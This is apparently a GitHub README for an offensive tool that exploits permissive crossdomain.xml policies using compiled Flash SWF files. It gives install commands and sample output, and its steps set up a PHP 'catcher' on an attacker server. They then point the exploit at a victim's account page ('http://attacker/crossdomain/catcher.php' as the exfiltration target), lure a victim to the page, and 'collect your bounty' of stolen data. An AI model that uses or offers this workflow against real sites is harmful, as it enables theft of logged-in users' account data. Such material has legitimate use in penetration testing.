/crossdomain-exploitation-framework

Everything you need to exploit overly permissive crossdomain.xml files

Primary LanguageActionScript

crossdomain-exploitation-framework

While not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.

Supported OS

Kali

Installing and using

root@kali:~# git clone https://github.com/sethsec/crossdomain-exploitation-framework.git
root@kali:~# cd crossdomain-exploitation-framework
root@kali:~/crossdomain-exploitation-framework# ./install.sh

Sample Output

root@kali-Preso:~/crossdomain-exploitation-framework# ./install.sh 

This install script will perform the following actions:
  1) Download and install openjdk-6-jdk and php5
  2) Download and install Adobe Flex (A 230mb download)
  3) Drop a php "catcher.php" script in the web root
  4) Download Gursev Kalra's ActionScript3 template
  5) Provide you with my additional ActionScript3 examples
  6) Configure your Apache instance to support SSL
  7) Restart your Apache instance
  8) Give you some guidance on how to compile your ActionScript3 into a SWF

Unrelated to compiling SWF files, this script will also copy the
http-crossdomain.nse NMAP script into /usr/share/nmap/scripts/ 
so that you can use it. I'll remove this once the nse gets added
to NMAP.


Before we get started, here is your opportunity to deviate from 
the default file locations. 

To accept the default settings, just hit enter:
  * Flex Install Location [/opt/flex]: 
  * Location for catcher.php [/var/www/crossdomain]: 
  * Location for xdx.html [/var/www/crossdomain]: 
  * Location for ActionScript3 templates [/home/seth/crossdomain-exploitation-framework/actionscript-templates]: 

<snip>

*****************
*  Next Steps   *
*****************

1) Edit the /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as file

   a) Specify the target URL
        Something like: http://vulnerable.com/account/settings
   b) Specify the server and page you want to send the data to:
        Something like: http://attacker/crossdomain/catcher.php

2) Compile the file:

   a) /opt/flex/bin/mxmlc /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as --output /var/www/crossdomain/XDomainXploit.swf

3) Edit /var/www/crossdomain/xdx.html and make sure it is pointing to the right SWF file
4) Get your victim to navigate to http://<your-hostname-or-ip>/<path>/xdx.html
5) Collect your bounty at /tmp/crossdomain_bounty.txt

* Additional templates have been provided, and are located in the following directory:
* /home/seth/crossdomain-exploitation-framework/actionscript-templates

Good luck!